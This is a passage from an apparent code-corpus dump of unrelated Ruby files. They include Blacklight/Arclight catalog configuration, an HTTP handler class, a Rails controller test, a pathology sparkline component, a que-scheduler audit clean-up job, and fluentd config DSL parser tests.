config.add_show_tools_partial(:sms, if: :render_sms_action?, callback: :sms_action, validator: :validate_sms_params)
config.add_show_tools_partial(:citation)
config.add_nav_action(:bookmark, partial: 'blacklight/nav/bookmark', if: :render_bookmarks_control?)
config.add_nav_action(:search_history, partial: 'blacklight/nav/search_history')
# solr fields that will be treated as facets by the blacklight application
# The ordering of the field names is the order of the display
#
# Setting a limit will trigger Blacklight's 'more' facet values link.
# * If left unset, then all facet values returned by solr will be displayed.
# * If set to an integer, then "f.somefield.facet.limit" will be added to
# solr request, with actual solr request being +1 your configured limit --
# you configure the number of items you actually want _displayed_ in a page.
# * If set to 'true', then no additional parameters will be sent to solr,
# but any 'sniffed' request limit parameters will be used for paging, with
# paging at requested limit -1. Can sniff from facet.limit or
# f.specific_field.facet.limit solr request params. This 'true' config
# can be used if you set limits in :default_solr_params, or as defaults
# on the solr side in the request handler itself. Request handler defaults
# sniffing requires solr requests to be made with "echoParams=all", for
# app code to actually have it echo'd back to see it.
#
# :show may be set to false if you don't want the facet to be drawn in the
# facet bar
#
# set :index_range to true if you want the facet pagination view to have facet prefix-based navigation
# (useful when user clicks "more" on a large facet and wants to navigate alphabetically across a large set of results)
# :index_range can be an array or range of prefixes that will be used to create the navigation (note: It is case sensitive when searching values)
config.add_facet_field 'collection_sim', label: 'Collection', limit: 10
config.add_facet_field 'creator_ssim', label: 'Creator', limit: 10
config.add_facet_field 'creators_ssim', label: 'Creator', show: false
config.add_facet_field 'date_range_sim', label: 'Date range', range: true
config.add_facet_field 'level_sim', label: 'Level', limit: 10
config.add_facet_field 'names_ssim', label: 'Names', limit: 10
config.add_facet_field 'repository_sim', label: 'Repository', limit: 10
config.add_facet_field 'geogname_sim', label: 'Place', limit: 10
config.add_facet_field 'places_ssim', label: 'Places', show: false
config.add_facet_field 'access_subjects_ssim', label: 'Subject', limit: 10
# Have BL send all facet field names to Solr, which has been the default
# previously. Simply remove these lines if you'd rather use Solr request
# handler defaults, or have no facets.
config.add_facet_fields_to_solr_request!
# solr fields to be displayed in the index (search results) view
# The ordering of the field names is the order of the display
config.add_index_field 'unitid_ssm', label: 'Unit ID'
config.add_index_field 'repository_ssm', label: 'Repository'
config.add_index_field 'normalized_date_ssm', label: 'Date'
config.add_index_field 'creator_ssm', label: 'Creator'
config.add_index_field 'language_ssm', label: 'Language'
config.add_index_field 'scopecontent_ssm', label: 'Scope Content', helper_method: :render_html_tags
config.add_index_field 'extent_ssm', label: 'Physical Description'
config.add_index_field 'accessrestrict_ssm', label: 'Conditions Governing Access', helper_method: :render_html_tags
config.add_index_field 'collection_ssm', label: 'Collection Title'
config.add_index_field 'geogname_ssm', label: 'Place'
config.add_facet_field 'has_online_content_ssim', label: 'Access', query: {
online: { label: 'Online access', fq: 'has_online_content_ssim:true' }
}
# solr fields to be displayed in the show (single result) view
# The ordering of the field names is the order of the display
# "fielded" search configuration. Used by pulldown among other places.
# For supported keys in hash, see rdoc for Blacklight::SearchFields
#
# Search fields will inherit the :qt solr request handler from
# config[:default_solr_parameters], OR can specify a different one
# with a :qt key/value. Below examples inherit, except for subject
# that specifies the same :qt as default for our own internal
# testing purposes.
#
# The :key is what will be used to identify this BL search field internally,
# as well as in URLs -- so changing it after deployment may break bookmarked
# urls. A display label will be automatically calculated from the :key,
# or can be specified manually to be different.
# This one uses all the defaults set by the solr request handler. Which
# solr request handler? The one set in config[:default_solr_parameters][:qt],
# since we aren't specifying it otherwise.
config.add_search_field 'all_fields', label: 'All Fields' do |field|
field.include_in_simple_select = true
end
config.add_search_field 'within_collection' do |field|
field.include_in_simple_select = false
field.solr_parameters = {
fq: '-level_sim:Collection'
}
end
# Field-based searches. We have registered handlers in the Solr configuration
# so we have Blacklight use the `qt` parameter to invoke them
config.add_search_field 'keyword', label: 'Keyword' do |field|
field.qt = 'search' # default
end
config.add_search_field 'name', label: 'Name' do |field|
field.qt = 'search'
field.solr_parameters = {
qf: '${qf_name}',
pf: '${pf_name}'
}
end
config.add_search_field 'place', label: 'Place' do |field|
field.qt = 'search'
field.solr_parameters = {
qf: '${qf_place}',
pf: '${pf_place}'
}
end
config.add_search_field 'subject', label: 'Subject' do |field|
field.qt = 'search'
field.solr_parameters = {
qf: '${qf_subject}',
pf: '${pf_subject}'
}
end
config.add_search_field 'title', label: 'Title' do |field|
field.qt = 'search'
field.solr_parameters = {
qf: '${qf_title}',
pf: '${pf_title}'
}
end
# "sort results by" select (pulldown)
# label in pulldown is followed by the name of the SOLR field to sort by and
# whether the sort is ascending or descending (it must be asc or desc
# except in the relevancy case).
config.add_sort_field 'score desc, title_sort asc', label: 'relevance'
config.add_sort_field 'date_sort asc', label: 'date (ascending)'
config.add_sort_field 'date_sort desc', label: 'date (descending)'
config.add_sort_field 'creator_sort asc', label: 'creator (A-Z)'
config.add_sort_field 'creator_sort desc', label: 'creator (Z-A)'
config.add_sort_field 'title_sort asc', label: 'title (A-Z)'
config.add_sort_field 'title_sort desc', label: 'title (Z-A)'
# If there are more than this many search results, no spelling ("did you
# mean") suggestion is offered.
config.spell_max = 5
# Configuration for autocomplete suggestor
config.autocomplete_enabled = true
config.autocomplete_path = 'suggest'
##
# Arclight Configurations
config.show.document_presenter_class = Arclight::ShowPresenter
config.index.document_presenter_class = Arclight::IndexPresenter
##
# Configuration for partials
config.index.partials = %i[arclight_index_default]
##
# Configuration for index actions
config.index.document_actions << :containers
config.index.document_actions << :online_content_label
config.add_results_document_tool :arclight_bookmark_control, partial: 'arclight_bookmark_control'
config.index.document_actions.delete(:bookmark)
config.show.metadata_partials = %i[
summary_field
access_field
background_field
related_field
indexed_terms_field
]
config.show.context_access_tab_items = %i[
terms_field
cite_field
in_person_field
contact_field
]
config.show.component_metadata_partials = %i[
component_field
component_indexed_terms_field
]
config.show.component_access_tab_items = %i[
component_terms_field
cite_field
in_person_field
contact_field
]
# ===========================
# COLLECTION SHOW PAGE FIELDS
# ===========================
# Collection Show Page - Summary Section
config.add_summary_field 'creators_ssim', label: 'Creator', link_to_facet: true
config.add_summary_field 'abstract_ssm', label: 'Abstract', helper_method: :render_html_tags
config.add_summary_field 'extent_ssm', label: 'Extent'
config.add_summary_field 'language_ssm', label: 'Language'
config.add_summary_field 'prefercite_ssm', label: 'Preferred citation', helper_method: :render_html_tags
# Collection Show Page - Background Section
config.add_background_field 'scopecontent_ssm', label: 'Scope and Content', helper_method: :render_html_tags
config.add_background_field 'bioghist_ssm', label: 'Biographical / Historical', helper_method: :render_html_tags
config.add_background_field 'acqinfo_ssm', label: 'Acquisition information', helper_method: :render_html_tags
config.add_background_field 'appraisal_ssm', label: 'Appraisal information', helper_method: :render_html_tags
config.add_background_field 'custodhist_ssm', label: 'Custodial history', helper_method: :render_html_tags
config.add_background_field 'processinfo_ssm', label: 'Processing information', helper_method: :render_html_tags
config.add_background_field 'arrangement_ssm', label: 'Arrangement', helper_method: :render_html_tags
config.add_background_field 'accruals_ssm', label: 'Accruals', helper_method: :render_html_tags
config.add_background_field 'phystech_ssm', label: 'Physical / technical requirements', helper_method: :render_html_tags
config.add_background_field 'physloc_ssm', label: 'Physical location', helper_method: :render_html_tags
config.add_background_field 'descrules_ssm', label: 'Rules or conventions', helper_method: :render_html_tags
# Collection Show Page - Related Section
config.add_related_field 'relatedmaterial_ssm', label: 'Related material', helper_method: :render_html_tags
config.add_related_field 'separatedmaterial_ssm', label: 'Separated material', helper_method: :render_html_tags
config.add_related_field 'otherfindaid_ssm', label: 'Other finding aids', helper_method: :render_html_tags
config.add_related_field 'altformavail_ssm', label: 'Alternative form available', helper_method: :render_html_tags
config.add_related_field 'originalsloc_ssm', label: 'Location of originals', helper_method: :render_html_tags
# Collection Show Page - Indexed Terms Section
config.add_indexed_terms_field 'access_subjects_ssim', label: 'Subjects', link_to_facet: true, separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}
config.add_indexed_terms_field 'names_coll_ssim', label: 'Names', separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}, helper_method: :link_to_name_facet
config.add_indexed_terms_field 'places_ssim', label: 'Places', link_to_facet: true, separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}
# ==========================
# COMPONENT SHOW PAGE FIELDS
# ==========================
# Component Show Page - Metadata Section
config.add_component_field 'containers', label: 'Containers', accessor: 'containers', separator_options: {
words_connector: ', ',
two_words_connector: ', ',
last_word_connector: ', '
}, if: lambda { |_context, _field_config, document|
document.containers.present?
}
config.add_component_field 'abstract_ssm', label: 'Abstract', helper_method: :render_html_tags
config.add_component_field 'extent_ssm', label: 'Extent'
config.add_component_field 'scopecontent_ssm', label: 'Scope and Content', helper_method: :render_html_tags
config.add_component_field 'acqinfo_ssm', label: 'Acquisition information', helper_method: :render_html_tags
config.add_component_field 'appraisal_ssm', label: 'Appraisal information', helper_method: :render_html_tags
config.add_component_field 'custodhist_ssm', label: 'Custodial history', helper_method: :render_html_tags
config.add_component_field 'processinfo_ssm', label: 'Processing information', helper_method: :render_html_tags
config.add_component_field 'arrangement_ssm', label: 'Arrangement', helper_method: :render_html_tags
config.add_component_field 'accruals_ssm', label: 'Accruals', helper_method: :render_html_tags
config.add_component_field 'phystech_ssm', label: 'Physical / technical requirements', helper_method: :render_html_tags
config.add_component_field 'physloc_ssm', label: 'Physical location', helper_method: :render_html_tags
# Component Show Page - Indexed Terms Section
config.add_component_indexed_terms_field 'access_subjects_ssim', label: 'Subjects', link_to_facet: true, separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}
config.add_component_indexed_terms_field 'names_ssim', label: 'Names', separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}, helper_method: :link_to_name_facet
config.add_component_indexed_terms_field 'places_ssim', label: 'Places', link_to_facet: true, separator_options: {
words_connector: '<br/>',
two_words_connector: '<br/>',
last_word_connector: '<br/>'
}
# =================
# ACCESS TAB FIELDS
# =================
# Collection Show Page Access Tab - Terms and Conditions Section
config.add_terms_field 'accessrestrict_ssm', label: 'Restrictions', helper_method: :render_html_tags
config.add_terms_field 'userestrict_ssm', label: 'Terms of Access', helper_method: :render_html_tags
# Component Show Page Access Tab - Terms and Condition Section
config.add_component_terms_field 'accessrestrict_ssm', label: 'Restrictions', helper_method: :render_html_tags
config.add_component_terms_field 'userestrict_ssm', label: 'Terms of Access', helper_method: :render_html_tags
config.add_component_terms_field 'parent_access_restrict_ssm', label: 'Parent Restrictions', helper_method: :render_html_tags
config.add_component_terms_field 'parent_access_terms_ssm', label: 'Parent Terms of Access', helper_method: :render_html_tags
# Collection and Component Show Page Access Tab - In Person Section
config.add_in_person_field 'repository_ssm', if: :repository_config_present, label: 'Location of this collection', helper_method: :context_access_tab_repository
config.add_in_person_field 'id', if: :before_you_visit_note_present, label: 'Before you visit', helper_method: :context_access_tab_visit_note # Using ID because we know it will always exist
# Collection and Component Show Page Access Tab - How to Cite Section
config.add_cite_field 'prefercite_ssm', label: 'Preferred citation', helper_method: :render_html_tags
# Collection and Component Show Page Access Tab - Contact Section
config.add_contact_field 'repository_ssm', if: :repository_config_present, label: 'Contact', helper_method: :access_repository_contact
# Remove unused show document actions
%i[citation email sms].each do |action|
config.view_config(:show).document_actions.delete(action)
end
# Insert the breadcrumbs at the beginning
config.show.partials.unshift(:show_upper_metadata)
config.show.partials.unshift(:show_breadcrumbs)
config.show.partials.delete(:show_header)
##
# Online Contents Index View
config.view.online_contents
config.view.online_contents.display_control = false
##
# Collection Context
config.view.collection_context
config.view.collection_context.display_control = false
config.view.collection_context.partials = %i[index_collection_context]
##
# Compact index view
config.view.compact
config.view.compact.partials = %i[arclight_index_compact]
end
end
| 48.371212 | 193 | 0.728583 |
0838b9a881b855bee8eff97b05abccaf4ae1f157 | 1,613 | require 'iolaus'
require 'iolaus/util/adapter'
# Base class for handlers
#
# Handlers are attached to requests added to instances of the
# {Iolaus::Client} class. Handlers may implement either
# the {#handle_request} or {#handle_response} methods.
class Iolaus::Handler
include Iolaus::Util::Adapter
# @!method handle_request(request)
# Process a request before execution
#
# Process a request before it is dispatched to a {Typhoeus::Hydra}
# instance.
#
# @param request [Typhoeus::Request] The request object.
# @return [Boolean] A boolean value indicating whether the request
# should be executed.
# @!method handle_response(response)
# Process a response after execution
#
# Process the results of executing a {Typhoeus::Request}
#
# @param response [Typhoeus::Response] The response object.
# @return [Object] The result to set as `handled_response` on the
# response object.
# Return the implemented request handler
#
# @return [#call] A callable object, if {#handle_request} is implemented.
# @return [nil] A `nil` value if {#handle_request} is not implemented.
def request_handler
if self.respond_to?(:handle_request)
self.method(:handle_request)
else
nil
end
end
# Return the implemented response handler
#
# @return [#call] A callable object, if {#handle_response} is implemented.
# @return [nil] A `nil` value if {#handle_response} is not implemented.
def response_handler
if self.respond_to?(:handle_response)
self.method(:handle_response)
else
nil
end
end
end
| 28.803571 | 76 | 0.699318 |
e9a96af51dfb814bd17c1ab0af54e73f0c4cd4bf | 1,240 | require 'spec_helper'
Obfuscator ||= Ingenico::Direct::SDK::Logging::Obfuscator
ValueObfuscator ||= Ingenico::Direct::SDK::Logging::ValueObfuscator
describe Obfuscator do
subject(:sample) { Obfuscator.new(obsfs, case_insensitive) }
context 'initialize' do
let(:obsfs) { { 'k1' => ValueObfuscator.INSTANCE,
'k2' => ValueObfuscator.INSTANCE } }
context 'case sensitive' do
let(:case_insensitive) { false }
it 'deep-copies obfuscators' do
obsfs_copy = sample.instance_variable_get(:@obfuscators)
obsfs['k2'] = nil
expect(obsfs_copy).not_to be_nil
end
end
context 'case insensitive' do
let(:case_insensitive) { true }
it 'deep-copies obfuscators' do
obsfs_copy = sample.instance_variable_get(:@obfuscators)
expect(obsfs_copy['K2']).to equal(obsfs_copy['k2'])
obsfs['k2'] = nil
expect(obsfs_copy).not_to be_nil
end
end
end
context '.obfuscate_value' do
let(:obsfs) { { 'k1' => ValueObfuscator.INSTANCE } }
let(:case_insensitive) { false }
it 'uses the correct obfuscator' do
str = 'str'
expect(
sample.obfuscate_value('k1', str)
).to eq('*3')
end
end
end
| 28.181818 | 67 | 0.635484 |
7a80551282475d849ece98ec3b9a80f66f91cb3f | 1,634 | require 'test_helper'
class DinosaursControllerTest < ActionDispatch::IntegrationTest
setup do
@dinosaur = dinosaurs(:one)
end
test "should get index" do
get dinosaurs_url, as: :json
assert_response :success
end
test "should create dinosaur" do
assert_difference('Dinosaur.count') do
post dinosaurs_url, params: { dinosaur: { description: @dinosaur.description, discovery_person: @dinosaur.discovery_person, discovery_year: @dinosaur.discovery_year, distribution: @dinosaur.distribution, end_stage: @dinosaur.end_stage, genus: @dinosaur.genus, grouping: @dinosaur.grouping, meaning: @dinosaur.meaning, period: @dinosaur.period, size: @dinosaur.size, start_stage: @dinosaur.start_stage, type_species: @dinosaur.type_species } }, as: :json
end
assert_response 201
end
test "should show dinosaur" do
get dinosaur_url(@dinosaur), as: :json
assert_response :success
end
test "should update dinosaur" do
patch dinosaur_url(@dinosaur), params: { dinosaur: { description: @dinosaur.description, discovery_person: @dinosaur.discovery_person, discovery_year: @dinosaur.discovery_year, distribution: @dinosaur.distribution, end_stage: @dinosaur.end_stage, genus: @dinosaur.genus, grouping: @dinosaur.grouping, meaning: @dinosaur.meaning, period: @dinosaur.period, size: @dinosaur.size, start_stage: @dinosaur.start_stage, type_species: @dinosaur.type_species } }, as: :json
assert_response 200
end
test "should destroy dinosaur" do
assert_difference('Dinosaur.count', -1) do
delete dinosaur_url(@dinosaur), as: :json
end
assert_response 204
end
end
| 41.897436 | 468 | 0.753978 |
5d7d5caef39ac85677c2bd639d9853c6a0b7be12 | 120 | # Preview all emails at http://localhost:3000/rails/mailers/rd_mailer
class RdMailerPreview < ActionMailer::Preview
end
| 30 | 69 | 0.816667 |
2145e9f64677105010270f61f81043b556413108 | 3,397 | # frozen_string_literal: true
# rubocop:disable Metrics/ClassLength
module Renalware
module Pathology
# Renders a pathology sparkline - a small graph of patient results for a particular
# OBX (observation_description) over time.
# TODO: Move the graph config into JS. Possibly use a stimulus controller
class SparklineComponent < ApplicationComponent
pattr_initialize [:current_user!, :patient!, :observation_description!]
CHART_OPTIONS = {
library: {
chart: {
type: "area",
margin: [0, 0, 0, 0],
height: 20,
width: 80,
skipClone: true,
style: {
overflow: "visible"
}
},
credits: {
enabled: false
},
title: "",
xAxis: {
type: "datetime",
tickPositions: [],
labels: {
enabled: false
},
startOnTick: false,
endOnTick: false,
title: {
text: nil
}
},
legend: {
enabled: false
},
yAxis: {
tickPositions: [0],
endOnTick: false,
startOnTick: false,
title: {
text: nil
},
min: 0,
labels: {
enabled: false
}
},
tooltip: {
hideDelay: 0,
outside: true,
shared: true,
xDateFormat: "%d-%b-%Y"
},
plotOptions: {
area: {
fillColor: {
linearGradient: {
x1: 0,
y1: 0,
x2: 0,
y2: 1
},
stops: [
[0, "#eee"],
[0.5, "#fff"]
]
}
},
series: {
animation: false,
lineWidth: 1,
shadow: false,
states: {
hover: {
lineWidth: 1
}
},
marker: {
radius: 1,
states: {
hover: {
radius: 2
}
}
},
fillOpacity: 0.25
},
column: {
negativeColor: "#910000",
borderColor: "silver"
}
}
}
}.freeze
def chart_data
@chart_data ||= patient
.observations
.where(description_id: observation_description.id)
.order(:observed_at)
.pluck([:observed_at, :result])
end
def cache_key
"#{patient.cache_key}/sparkline/#{observation_description.id}"
end
# Because we cache the component html inside the view sidecar, we want to
# avoid implementing this method properly - ie checking if there anything
# to render - as that would involve querying the database, thus negating
# the befit of any caching.
def render?
true
end
def options
CHART_OPTIONS
end
def dom_id
@dom_id ||= ActionView::RecordIdentifier.dom_id(observation_description)
end
end
end
end
# rubocop:enable Metrics/ClassLength
| 25.350746 | 87 | 0.431557 |
08fe83e895095c0a9c1481ea51d853fff783581f | 1,699 | require "que"
# This job can optionally be scheduled to clear down the que-scheduler audit log if it
# isn't required in the long term.
module Que
module Scheduler
module Jobs
class QueSchedulerAuditClearDownJob < Que::Job
class << self
def build_sql(table_name)
<<~SQL
WITH deleted AS (
DELETE FROM #{table_name}
WHERE scheduler_job_id <= (
SELECT scheduler_job_id FROM que_scheduler_audit
ORDER BY scheduler_job_id DESC
LIMIT 1 OFFSET $1
) RETURNING *
) SELECT count(*) FROM deleted;
SQL
end
end
DELETE_AUDIT_ENQUEUED_SQL = build_sql("que_scheduler_audit_enqueued").freeze
DELETE_AUDIT_SQL = build_sql("que_scheduler_audit").freeze
# Very low priority
Que::Scheduler::VersionSupport.set_priority(self, 100)
def run(options)
retain_row_count = options.fetch(:retain_row_count)
Que::Scheduler::Db.transaction do
# This may delete zero or more than `retain_row_count` depending on if anything was
# scheduled in each of the past schedule runs
Que::Scheduler::VersionSupport.execute(DELETE_AUDIT_ENQUEUED_SQL, [retain_row_count])
# This will delete all but `retain_row_count` oldest rows
count = Que::Scheduler::VersionSupport.execute(DELETE_AUDIT_SQL, [retain_row_count])
log = "#{self.class} cleared down #{count.first.fetch(:count)} rows"
::Que.log(event: "que-scheduler".to_sym, message: log)
end
end
end
end
end
end
| 36.934783 | 97 | 0.618011 |
ed0ee0c2c9ac5bcedce485c587db687d2636296b | 12,495 | require_relative '../helper'
require 'fluent/config/element'
require "fluent/config/dsl"
TMP_DIR = File.dirname(__FILE__) + "/tmp/config_dsl#{ENV['TEST_ENV_NUMBER']}"
def write_config(path, data)
FileUtils.mkdir_p(File.dirname(path))
File.open(path, "w") {|f| f.write data }
end
def prepare_config1
write_config "#{TMP_DIR}/config_test_1.conf", %[
k1 root_config
include dir/config_test_2.conf #
@include #{TMP_DIR}/config_test_4.conf
include file://#{TMP_DIR}/config_test_5.conf
@include config.d/*.conf
]
write_config "#{TMP_DIR}/dir/config_test_2.conf", %[
k2 relative_path_include
@include ../config_test_3.conf
]
write_config "#{TMP_DIR}/config_test_3.conf", %[
k3 relative_include_in_included_file
]
write_config "#{TMP_DIR}/config_test_4.conf", %[
k4 absolute_path_include
]
write_config "#{TMP_DIR}/config_test_5.conf", %[
k5 uri_include
]
write_config "#{TMP_DIR}/config.d/config_test_6.conf", %[
k6 wildcard_include_1
<elem1 name>
include normal_parameter
</elem1>
]
write_config "#{TMP_DIR}/config.d/config_test_7.conf", %[
k7 wildcard_include_2
]
write_config "#{TMP_DIR}/config.d/config_test_8.conf", %[
<elem2 name>
@include ../dir/config_test_9.conf
</elem2>
]
write_config "#{TMP_DIR}/dir/config_test_9.conf", %[
k9 embeded
<elem3 name>
nested nested_value
include hoge
</elem3>
]
write_config "#{TMP_DIR}/config.d/00_config_test_8.conf", %[
k8 wildcard_include_3
<elem4 name>
include normal_parameter
</elem4>
]
end
def prepare_config2
write_config "#{TMP_DIR}/config_test_1.rb", DSL_CONFIG_EXAMPLE
end
DSL_CONFIG_EXAMPLE = %q[
worker {
hostname = "myhostname"
(0..9).each { |i|
source {
type :tail
path "/var/log/httpd/access.part#{i}.log"
filter ('bar.**') {
type :hoge
val1 "moge"
val2 ["foo", "bar", "baz"]
val3 10
id :hoge
subsection {
foo "bar"
}
subsection {
foo "baz"
}
}
filter ('foo.**') {
type "pass"
}
match ('{foo,bar}.**') {
type "file"
path "/var/log/httpd/access.#{hostname}.#{i}.log"
}
}
}
}
]
DSL_CONFIG_EXAMPLE_WITHOUT_WORKER = %q[
hostname = "myhostname"
source {
type :tail
path "/var/log/httpd/access.part.log"
element {
name "foo"
}
match ('{foo,bar}.**') {
type "file"
path "/var/log/httpd/access.full.log"
}
}
]
DSL_CONFIG_EXAMPLE_FOR_INCLUDE_CONF = %q[
include "#{TMP_DIR}/config_test_1.conf"
]
DSL_CONFIG_EXAMPLE_FOR_INCLUDE_RB = %q[
include "#{TMP_DIR}/config_test_1.rb"
]
DSL_CONFIG_RETURNS_NON_ELEMENT = %q[
worker {
}
[]
]
DSL_CONFIG_WRONG_SYNTAX1 = %q[
match
]
DSL_CONFIG_WRONG_SYNTAX2 = %q[
match('aa','bb'){
type :null
}
]
DSL_CONFIG_WRONG_SYNTAX3 = %q[
match('aa','bb')
]
DSL_CONFIG_WRONG_SYNTAX4 = %q[
include
]
module Fluent::Config
class TestDSLParser < ::Test::Unit::TestCase
sub_test_case 'with worker tag on top level' do
def setup
@root = Fluent::Config::DSL::Parser.parse(DSL_CONFIG_EXAMPLE, 'dsl_config.rb')
end
sub_test_case '.parse' do
test 'makes root element' do
assert_equal('ROOT', @root.name)
assert_predicate(@root.arg, :empty?)
assert_equal(0, @root.keys.size)
end
test 'makes worker element for worker tag' do
assert_equal(1, @root.elements.size)
worker = @root.elements.first
assert_equal('worker', worker.name)
assert_predicate(worker.arg, :empty?)
assert_equal(0, worker.keys.size)
assert_equal(10, worker.elements.size)
end
test 'makes subsections for blocks, with variable substitution' do
ele4 = @root.elements.first.elements[4]
assert_equal('source', ele4.name)
assert_predicate(ele4.arg, :empty?)
assert_equal(2, ele4.keys.size)
assert_equal('tail', ele4['type'])
assert_equal("/var/log/httpd/access.part4.log", ele4['path'])
end
test 'makes user-defined sections with blocks' do
filter0 = @root.elements.first.elements[4].elements.first
assert_equal('filter', filter0.name)
assert_equal('bar.**', filter0.arg)
assert_equal('hoge', filter0['type'])
assert_equal('moge', filter0['val1'])
assert_equal(JSON.dump(['foo', 'bar', 'baz']), filter0['val2'])
assert_equal('10', filter0['val3'])
assert_equal('hoge', filter0['id'])
assert_equal(2, filter0.elements.size)
assert_equal('subsection', filter0.elements[0].name)
assert_equal('bar', filter0.elements[0]['foo'])
assert_equal('subsection', filter0.elements[1].name)
assert_equal('baz', filter0.elements[1]['foo'])
end
test 'makes values with user-assigned variable substitutions' do
match0 = @root.elements.first.elements[4].elements.last
assert_equal('match', match0.name)
assert_equal('{foo,bar}.**', match0.arg)
assert_equal('file', match0['type'])
assert_equal('/var/log/httpd/access.myhostname.4.log', match0['path'])
end
end
end
sub_test_case 'without worker tag on top level' do
def setup
@root = Fluent::Config::DSL::Parser.parse(DSL_CONFIG_EXAMPLE_WITHOUT_WORKER, 'dsl_config_without_worker.rb')
end
sub_test_case '.parse' do
test 'makes root element' do
assert_equal('ROOT', @root.name)
assert_predicate(@root.arg, :empty?)
assert_equal(0, @root.keys.size)
end
test 'does not make worker element implicitly because DSL configuration does not support v10 compat mode' do
assert_equal(1, @root.elements.size)
assert_equal('source', @root.elements.first.name)
refute(@root.elements.find { |e| e.name == 'worker' })
end
end
end
sub_test_case 'with include conf' do
def setup
prepare_config1
@root = Fluent::Config::DSL::Parser.parse(DSL_CONFIG_EXAMPLE_FOR_INCLUDE_CONF, 'dsl_config_for_include.conf')
end
test 'include config' do
assert_equal('root_config', @root['k1'])
assert_equal('relative_path_include', @root['k2'])
assert_equal('relative_include_in_included_file', @root['k3'])
assert_equal('absolute_path_include', @root['k4'])
assert_equal('uri_include', @root['k5'])
assert_equal('wildcard_include_1', @root['k6'])
assert_equal('wildcard_include_2', @root['k7'])
assert_equal('wildcard_include_3', @root['k8'])
assert_equal([
'k1',
'k2',
'k3',
'k4',
'k5',
'k8', # Because of the file name this comes first.
'k6',
'k7',
], @root.keys)
elem1 = @root.elements.find { |e| e.name == 'elem1' }
assert(elem1)
assert_equal('name', elem1.arg)
assert_equal('normal_parameter', elem1['include'])
elem2 = @root.elements.find { |e| e.name == 'elem2' }
assert(elem2)
assert_equal('name', elem2.arg)
assert_equal('embeded', elem2['k9'])
assert_not_include(elem2, 'include')
elem3 = elem2.elements.find { |e| e.name == 'elem3' }
assert(elem3)
assert_equal('nested_value', elem3['nested'])
assert_equal('hoge', elem3['include'])
end
# TODO: Add uri based include spec
end
sub_test_case 'with include rb' do
def setup
prepare_config2
@root = Fluent::Config::DSL::Parser.parse(DSL_CONFIG_EXAMPLE_FOR_INCLUDE_RB, 'dsl_config_for_include.rb')
end
sub_test_case '.parse' do
test 'makes root element' do
assert_equal('ROOT', @root.name)
assert_predicate(@root.arg, :empty?)
assert_equal(0, @root.keys.size)
end
test 'makes worker element for worker tag' do
assert_equal(1, @root.elements.size)
worker = @root.elements.first
assert_equal('worker', worker.name)
assert_predicate(worker.arg, :empty?)
assert_equal(0, worker.keys.size)
assert_equal(10, worker.elements.size)
end
test 'makes subsections for blocks, with variable substitution' do
ele4 = @root.elements.first.elements[4]
assert_equal('source', ele4.name)
assert_predicate(ele4.arg, :empty?)
assert_equal(2, ele4.keys.size)
assert_equal('tail', ele4['type'])
assert_equal("/var/log/httpd/access.part4.log", ele4['path'])
end
test 'makes user-defined sections with blocks' do
filter0 = @root.elements.first.elements[4].elements.first
assert_equal('filter', filter0.name)
assert_equal('bar.**', filter0.arg)
assert_equal('hoge', filter0['type'])
assert_equal('moge', filter0['val1'])
assert_equal(JSON.dump(['foo', 'bar', 'baz']), filter0['val2'])
assert_equal('10', filter0['val3'])
assert_equal('hoge', filter0['id'])
assert_equal(2, filter0.elements.size)
assert_equal('subsection', filter0.elements[0].name)
assert_equal('bar', filter0.elements[0]['foo'])
assert_equal('subsection', filter0.elements[1].name)
assert_equal('baz', filter0.elements[1]['foo'])
end
test 'makes values with user-assigned variable substitutions' do
match0 = @root.elements.first.elements[4].elements.last
assert_equal('match', match0.name)
assert_equal('{foo,bar}.**', match0.arg)
assert_equal('file', match0['type'])
assert_equal('/var/log/httpd/access.myhostname.4.log', match0['path'])
end
end
end
sub_test_case 'with configuration that returns non element on top' do
sub_test_case '.parse' do
test 'does not crash' do
Fluent::Config::DSL::Parser.parse(DSL_CONFIG_RETURNS_NON_ELEMENT, 'dsl_config_returns_non_element.rb')
end
end
end
sub_test_case 'with configuration with wrong arguments for specific elements' do
sub_test_case '.parse' do
test 'raises ArgumentError correctly' do
assert_raise(ArgumentError) { Fluent::Config::DSL::Parser.parse(DSL_CONFIG_WRONG_SYNTAX1, 'dsl_config_wrong_syntax1') }
assert_raise(ArgumentError) { Fluent::Config::DSL::Parser.parse(DSL_CONFIG_WRONG_SYNTAX2, 'dsl_config_wrong_syntax2') }
assert_raise(ArgumentError) { Fluent::Config::DSL::Parser.parse(DSL_CONFIG_WRONG_SYNTAX3, 'dsl_config_wrong_syntax3') }
assert_raise(ArgumentError) { Fluent::Config::DSL::Parser.parse(DSL_CONFIG_WRONG_SYNTAX4, 'dsl_config_wrong_syntax4') }
end
end
end
sub_test_case 'with ruby keyword, that provides ruby Kernel module features' do
sub_test_case '.parse' do
test 'can get result of Kernel.open() by ruby.open()' do
uname_string = `uname -a`
root = Fluent::Config::DSL::Parser.parse(<<DSL)
worker {
uname_str = ruby.open('|uname -a'){|out| out.read}
source {
uname uname_str
}
}
DSL
worker = root.elements.first
assert_equal('worker', worker.name)
source = worker.elements.first
assert_equal('source', source.name)
assert_equal(1, source.keys.size)
assert_equal(uname_string, source['uname'])
end
test 'accepts ruby keyword with block, which allow to use methods included from ::Kernel' do
root = Fluent::Config::DSL::Parser.parse(<<DSL)
worker {
ruby_version = ruby {
require 'erb'
ERB.new('<%= RUBY_VERSION %> from erb').result
}
source {
version ruby_version
}
}
DSL
worker = root.elements.first
assert_equal('worker', worker.name)
source = worker.elements.first
assert_equal('source', source.name)
assert_equal(1, source.keys.size)
assert_equal("#{RUBY_VERSION} from erb", source['version'])
end
test 'raises NoMethodError when configuration DSL elements are written in ruby block' do
conf = <<DSL
worker {
ruby {
source {
type "tail"
}
}
source {
uname uname_str
}
}
DSL
assert_raise(NoMethodError) { Fluent::Config::DSL::Parser.parse(conf) }
end
end
end
end
end
| 30.036058 | 129 | 0.62385 |
1de006a8902ac72e0aa2a6cd5ef2882966c0308b | 8,534 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe "Using the Service API", :reset_redis => false, :populate_sample_data => true do
before(:all) do
@sample_host = {:name => 'rspec_sample_host', :status => 'up'}
